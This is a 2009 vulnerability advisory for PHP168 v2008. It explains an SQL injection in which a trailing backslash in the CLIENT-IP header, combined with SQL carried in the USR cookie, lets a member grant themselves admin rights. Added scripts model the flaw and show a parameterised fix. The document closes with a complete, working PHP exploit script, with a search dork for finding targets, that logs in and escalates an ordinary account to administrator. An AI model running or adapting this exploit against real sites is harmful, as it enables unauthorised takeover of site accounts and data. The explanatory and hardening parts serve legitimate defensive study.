Php168 v2008 privilege escalation vulnerability
Source: http://www.wolvez.org  Author: Ryat  Published: 2009-02-02

by Ryat
http://www.wolvez.org
2009-01-25

A brief analysis of the vulnerability.

PHP code
common.inc.php

if($_SERVER['HTTP_CLIENT_IP']){
     $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
     $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
     $onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));
//Using preg_replace here is a weak spot: it only rewrites $onlineip when the value starts with digits or dots and returns any other value unchanged. A vulnerability here was disclosed before; the official fix was simply to pass $onlineip through the filtrate function first.
Let's look at what filtrate() actually does:

PHP code
function.inc.php

function filtrate($msg){
    // The replacement strings are HTML entities; the rendered page had decoded
    // them, so they are restored here (the exact &nbsp; sequences used for \t
    // and for three spaces are reconstructed).
    $msg = str_replace('&','&amp;',$msg);
    $msg = str_replace(' ','&nbsp;',$msg);
    $msg = str_replace('"','&quot;',$msg);
    $msg = str_replace("'",'&#39;',$msg);
    $msg = str_replace("<","&lt;",$msg);
    $msg = str_replace(">","&gt;",$msg);
    $msg = str_replace("\t","&nbsp; &nbsp; &nbsp; ",$msg);
    $msg = str_replace("\r","",$msg);
    $msg = str_replace("   ","&nbsp;&nbsp;&nbsp;",$msg);
    return $msg;
}
It neutralises ', ", < and the like by entity-encoding them, but it does nothing about \ .
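As an added illustration (not part of the original article and not PHP168's own code), the script below models the two normalisation steps above and a hardened replacement. htmlspecialchars() stands in for filtrate(), which is an assumption: both entity-encode the same characters and both leave a backslash untouched. The hardened function and the probe values are mine.

```php
<?php
// Added example (not PHP168 code): models filtrate()+preg_replace() from
// common.inc.php and a hardened replacement. htmlspecialchars() stands in
// for filtrate(); both entity-encode & ' " < > and leave a backslash alone.

function php168_onlineip(string $headerValue): string
{
    $ip = htmlspecialchars($headerValue, ENT_QUOTES);   // stand-in for filtrate()
    // Same pattern as common.inc.php. preg_replace() only rewrites a subject the
    // pattern matches; "ryat\" has no leading digit, so it comes back unchanged.
    return preg_replace('/^([\d\.]+).*/', '\\1', $ip);
}

function hardened_onlineip(array $server): string
{
    // Only believe these headers behind a proxy you control; the point here is
    // that whatever is accepted must be a syntactically valid IP and nothing else.
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR'] as $h) {
        if (empty($server[$h])) {
            continue;
        }
        $first = trim(explode(',', $server[$h])[0]);   // X-Forwarded-For may be a chain
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $server['REMOTE_ADDR'];
}

// Constructed probe values; REMOTE_ADDR is the socket peer the proxy headers try to override.
$probes = ['1.2.3.4', '1.2.3.4 attacker', "ryat'", "ryat\\", "1.2.3.4\\"];
foreach ($probes as $p) {
    $server = ['HTTP_CLIENT_IP' => $p, 'REMOTE_ADDR' => '10.0.0.1'];
    printf("%-20s page code: %-16s hardened: %s\n",
        var_export($p, true),
        var_export(php168_onlineip($p), true),
        hardened_onlineip($server));
}
// "ryat'"    -> 'ryat&#039;'  the quote is dead, which is why the earlier quote-based attack no longer works
// "ryat\"    -> 'ryat\'       no leading digits, so the pattern never matches and the backslash survives
// "1.2.3.4\" -> '1.2.3.4'     with a numeric prefix the pattern matches and the tail is discarded
```

Run with php on the command line. The pair of backslash probes is the useful one: the regex does strip a trailing backslash, but only when the header starts with digits, so an all-letters value sails through both steps.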

PHP code
common.inc.php

    if($usr_oltime>30||!$usr_oltime){
        $usr_oltime>600 && $usr_oltime=600;
        include(PHP168_PATH."php168/level.php");
        if( isset($memberlevel[$lfjdb[groupid]]) ){
            $SQL=",groupid=8";
            $lfjdb[money]=get_money($lfjuid);
            foreach( $memberlevel AS $key=>$value){
                if($lfjdb[money]>=$value){
                    $SQL=",groupid=$key";
                }
            }
        }else{
            $SQL="";
        }
        $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
//Because the query is built by string concatenation, a trailing \ in $onlineip escapes the quote that should close lastip='...'; everything up to the next quote is swallowed into that literal, and the value of $usr_oltime (which the exploit supplies through the USR cookie) then lands in the statement as raw SQL :)
Note also that $usr_oltime is subject to a simple check (it has to compare greater than 30, and anything above 600 is clamped to 600), and the statement must still be syntactically valid SQL. Here is the statement I constructed, with the two injected values in square brackets:

SQL
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

MySQL reads lastip='\',oltime=oltime+' as a single string literal, so what follows is parsed as bare SQL: +31 keeps the SET list syntactically valid (and, as a leading-numeric string, passes the >30 check on the PHP 5 of the day), groupid=3 and introduce=0x70757265745f74 are attacker-chosen assignments (the hex is 'puret_t', which the exploit below looks for as its success marker), WHERE uid=2 selects the row, and # comments out the original tail of the statement.
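An added example, not PHP168 code, that rebuilds the UPDATE from the two injected values and then runs a hardened form of the same update through PDO against an in-memory SQLite table. The pdo_sqlite extension, the table layout and the sample row are assumptions; the real target is MySQL, where the backslash-escaped quote is what makes the injected text parse as SQL, so the vulnerable statement is only printed here, not executed.

```php
<?php
// Added example (not PHP168 code). Assembles the UPDATE from common.inc.php
// with the page's two injected values, then runs a hardened version against
// an in-memory SQLite database via PDO (assumes pdo_sqlite; the table and the
// sample row are constructed for this example).

$pre        = 'php168_';                      // table prefix: configuration, not user input
$timestamp  = 1233000000;
$lfjuid     = 2;                              // uid of the logged-in attacker
$onlineip   = "ryat\\";                       // CLIENT-IP value after filtrate()+preg_replace()
$usr_oltime = "+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#";   // second field of the USR cookie

// The branch condition from common.inc.php. PHP 5/7 compare a leading-numeric
// string as its number (31), so "+31,..." passes the >30 test. PHP 8 compares
// int vs non-numeric string as strings, and the branch is no longer taken.
function page_guard_takes_branch($v): bool
{
    return $v > 30 || !$v;
}

// The vulnerable statement, built by concatenation exactly as on the page.
function vulnerable_query(string $pre, int $ts, string $ip, string $oltime, string $SQL, int $uid): string
{
    return "UPDATE {$pre}memberdata SET lastvist='$ts',lastip='$ip',oltime=oltime+'$oltime'$SQL WHERE uid='$uid'";
}

// Hardened form: validate the IP, cast the interval before the range check,
// bind every value, and never let the request choose groupid.
function hardened_update(PDO $db, string $pre, string $ip, $usr_oltime, int $ts, int $uid, ?int $groupid): int
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        $ip = '0.0.0.0';
    }
    $oltime = (int)$usr_oltime;               // "+31,groupid=3,..." -> 31; the SQL tail is gone
    if (!($oltime > 30 || $oltime === 0)) {
        return 0;                             // the page's rule, applied to an integer
    }
    $oltime = min($oltime, 600);
    $sql = "UPDATE {$pre}memberdata SET lastvist=:ts, lastip=:ip, oltime=oltime+:ol"
         . ($groupid !== null ? ", groupid=:gid" : "")
         . " WHERE uid=:uid";
    $st = $db->prepare($sql);
    $st->bindValue(':ts', $ts, PDO::PARAM_INT);
    $st->bindValue(':ip', $ip, PDO::PARAM_STR);
    $st->bindValue(':ol', $oltime, PDO::PARAM_INT);
    if ($groupid !== null) {
        $st->bindValue(':gid', $groupid, PDO::PARAM_INT);
    }
    $st->bindValue(':uid', $uid, PDO::PARAM_INT);
    $st->execute();
    return $st->rowCount();
}

echo "guard takes branch: ", var_export(page_guard_takes_branch($usr_oltime), true), " (PHP ", PHP_VERSION, ")\n";
echo vulnerable_query($pre, $timestamp, $onlineip, $usr_oltime, '', $lfjuid), "\n";
// MySQL tokenises that as: lastip='ryat\',oltime=oltime+'  +31  ,groupid=3  ,introduce=0x70757265745f74  WHERE uid=2  #...
// one string literal, a numeric addition, two attacker-chosen assignments, an attacker-chosen WHERE.
echo "introduce marker: ", hex2bin('70757265745f74'), "\n";   // puret_t

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE {$pre}memberdata (uid INTEGER PRIMARY KEY, lastvist INTEGER, lastip TEXT, oltime INTEGER, groupid INTEGER, introduce TEXT)");
$db->exec("INSERT INTO {$pre}memberdata VALUES (2, 0, '', 0, 8, '')");
hardened_update($db, $pre, $onlineip, $usr_oltime, $timestamp, $lfjuid, null);
print_r($db->query("SELECT lastip, oltime, groupid, introduce FROM {$pre}memberdata WHERE uid=2")->fetch(PDO::FETCH_ASSOC));
// lastip=0.0.0.0, oltime=31, groupid=8, introduce='' : the same inputs no longer touch groupid.
```

Run with php on the command line. On PHP 5 and 7 the first line prints true and on PHP 8 it prints false, because 8.0 changed int-versus-non-numeric-string comparisons to string comparisons; the hardened update yields the same row either way, which is the property you want from the fix.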
Finally, the exploit:

PHP code
#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ user pass
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// Step 1: log in as an ordinary member and capture the passport cookie; the
// second capture group is our own uid, which the injected WHERE clause targets.
$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

// Step 2: replay with the CLIENT-IP/USR payload and look for the marker
// written into the introduce field (0x70757265745f74 = 'puret_t').
if ($cookie) {
    if (strpos(send(), 'puret_t') !== false) {
        exit("Exploit Success!\nYou Are Admin Now!\n");
    } else {
        exit("Exploit Failed!\n");
    }
} else {
    exit("Exploit Failed!\n");
}

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        // USR cookie: <random>\t<usr_oltime>\t\t. PHP url-decodes cookie values,
        // so %2b becomes '+' and $usr_oltime ends up as
        // "+31,groupid=3,introduce=0x70757265745f74 WHERE uid=<our uid>#".
        $cookie[1] .= ';USR='.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '';

        $message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        // Header value is "ryat\": the trailing backslash escapes the quote that closes lastip='...'
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."login.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    if (!$fp) {
        exit("Could not connect to $host:80\n");
    }
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
